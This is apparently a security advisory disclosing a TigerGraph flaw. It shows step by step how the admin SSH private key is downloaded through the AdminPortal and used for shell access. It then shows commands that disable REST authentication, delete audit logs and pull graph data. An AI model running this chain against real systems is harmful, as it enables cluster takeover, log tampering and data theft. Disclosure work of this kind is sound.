The TigerGraph platform runs all system services using a single administrative user — tigergraph — who has the ability to remotely login to other remote nodes within the TigerGraph cluster using the SSH protocol. The installation guide details this as a precondition for installing TigerGraph in a clustered configuration and the set of administrative commands that are available to the Tigergraph user due to this configuration can be found in the (legacy) documentation.
This report shows that the TigerGraph platform does not sufficiently protect the SSH credentials of the administrative user and how this can be exploited to give an attacker full control over an entire TigerGraph cluster and underlying servers.
Impact
Severe. This vulnerability is a vector that can be used to obtain administrative privileges on a remote TigerGraph platform. This increases the severity of CVE-2022-30331 as it highlights that there are multiple ways of obtaining administrative level privileges either by utilizing existing vulnerabilities, like CVE-2023-22950 (data loading) and CVE-2023-22949 (logging user credentials). Once an attacker has access to an administrative shell then they have full control over the entire TigerGraph cluster and underlying servers.Products/Versions Affected
- TigerGraph Enterprise Free Edition 3.7.0 Docker Image
- TigerGraph Enterprise Free Edition 3.7.0
- TigerGraph Cloud
We suspect that this vulnerability is present in all existing TigerGraph products (although this is not confirmed).
Steps to Reproduce
Download and Run TigerGraph
Using docker download at the latest TigerGraph image and start the server:
1.) Optional: clean-up old TigerGraph docker images and obtain the latest version:docker rm tigergraph docker pull docker.tigergraph.com/tigergraph:latest2.) Download and run the docker image (note: we do not need to attach a volume):
docker run -d \ -p 14022:22 \ -p 9000:9000 \ -p 14240:14240 \ --name tigergraph \ --ulimit nofile=1000000:1000000 \ -t docker.tigergraph.com/tigergraph:latest3.) Once the container has started, connect to it via ssh (note: the default password is ‘tigergraph’):
ssh -p 14022 tigergraph@localhost4.) Start all TigerGraph services:
gadmin start all5.) Using GSQL, create a new graph called test and add a node to it:
$ gsql
GSQL> CREATE VERTEX Node(PRIMARY_ID id UINT, value STRING) WITH primary_id_as_attribute="true"
GSQL> CREATE GRAPH test(*)
GSQL> begin
GSQL> CREATE QUERY ins(UINT id, STRING value) FOR GRAPH test2 {
GSQL> INSERT INTO Node VALUES(id, value);
GSQL> }
GSQL> end
GSQL> interpret query ins(1,"hello”)
6.) Enable RESTPP authentication
gadmin config set RESTPP.Factory.EnableAuth true gadmin config apply -y gadmin restart restpp nginx gui gsql -y
Obtaining Administrative SSH Credentials
To demonstrate that SSH credentials of the administrative user are readily obtainable we download them via the AdminPortal. Although, this step assumes that the login credentials of the administrative user are known; a situation that is plausible (see CVE-2023-22949 which details how to locate the login credentials of the administrative user within the system logs).
If however, the login credentials are not known, the SSH credentials can also be exfiltrated from the TigerGraph platform using the technique described in CVE-2023-22950 where a user with low-levels of privilege is able to exploit a weakness in GSQL to load data from arbitrary files into the database. We also found that it is possible to exfiltrate SSH credentials under normal operating conditions by exploiting GSQL’s UDF facility to read arbitrary files (see CVE-2022-30331).
Login To The AdminPortal
The simplest way to obtain the administrative users login credentials is using AdminStudio and to do this follow these steps:
1.) Open a web-browser and go to https://localhost:1420 where you will be able to login to GraphStudio using thetigergraph user:
2.) Click on the “Admin” button on the top-right corner to switch into administrative mode (called the AdminPortal).
Downloading SSH Credential via AdminPortal
Once logged into the AdminPortal follow the following steps to download the SSH private key of the tigergraph user:
- On the left-hand side expand the “Others” menu.
- Click on “GSQL Output File” to open the file preview pane.
- In the “File path” textbox enter the text “
/home/tigergraph/.ssh/tigergraph_rsa“. - Click “Preview” to check that the file exists – if it does the first few lines will be displayed.
- Finally, click “Download” and the file will be downloaded to your local computer. On our system it was called
m1_tigergraph_rsa.
Using The SSH Credentials To Obtain Access
Once the SSH credentials of the administrative user have been obtained they can be used to authenticate with the remote TigerGraph server and obtain shell access as the administrative user without requiring a password.
1.) Change the file permissions and load the credentials into your SSH keychain:chmod 0600 m1_tigergraph_rsa ssh-add -l The agent has no identities. ssh-add m1_tigergraph_rsa Identity added: m1_tigergraph_rsa (m1_tigergraph_rsa) ssh-add -l 4096 SHA256:vLvC0SaCrFDiJ/BbcP7c0GcA3tBoXxq+Om9kZg+t14Q m1_tigergraph_rsa (RSA)2.) Using this private SSH key it is possible to login to the remote TigerGraph server as the administrative user (
tigergraph) without requiring a password via SSH. In our docker setup we simply connect to localhost on port 14022:
ssh tigergraph@localhost -p 14022 The authenticity of host '[localhost]:14022 ([::1]:14022)' can't be established. ED25519 key fingerprint is SHA256:zQKFdcNAdX7TwiBtQT1vuDdHWm2o07kS/mcwnSFeMYY. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '[localhost]:14022' (ED25519) to the list of known hosts. james@localhost's password: Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.10.104-linuxkit x86_64) * Documentation:https://help.ubuntu.com * Management: https://landscape.canonical.com * Support:https://ubuntu.com/advantage This system has been minimized by removing packages and content that are not required on a system that users do not log into. To restore this content, you can run the 'unminimize' command. Last login: Mon Jun 20 12:28:10 2022 from 172.17.0.1 tigergraph@092eb28b2d49:~$
If successful, you should see a shell session in which you can freely execute commands as the tigergraph user:
Circumventing Security Features And Exfiltrating Data
Now that we have shell access as the administrative user, we can now disable authentication for the REST API and wipe out a selection of the systems audit logs:
tigergraph@092eb28b2d49:~$ gadmin config set RESTPP.Factory.EnableAuth false [ Info] Configuration has been changed. Please use 'gadmin config apply' to persist the changes. tigergraph@092eb28b2d49:~$ gadmin config apply [ Note] Changes: RESTPP.Factory.EnableAuth: true -> false Proceed to apply? (y/N)y [ Info] Successfully applied configuration change. Please restart services to make it effective immediately. tigergraph@092eb28b2d49:~$ gadmin restart restpp nginx gui gsql -y [ Info] Stopping NGINX RESTPP GSQL GUI [ Info] Starting ZK ETCD DICT KAFKA ADMIN GSE NGINX GPE RESTPP KAFKASTRM-LL KAFKACONN GSQL GUI tigergraph@092eb28b2d49:~$ rm gsql/* restpp/* controller/*
To prove that authentication is disabled we now exfiltrate some sensitive data from a second graph `test` that has zero authorized users:
curl -X GET "https://localhost:14240/restpp/graph/test/vertices/Node"
{"version":{"edition":"enterprise","api":"v2","schema":1},"error":false,"message":"","results":[{"v_id":"1","v_type":"Node","attributes":{"id":1,"value":"hello"}}]}%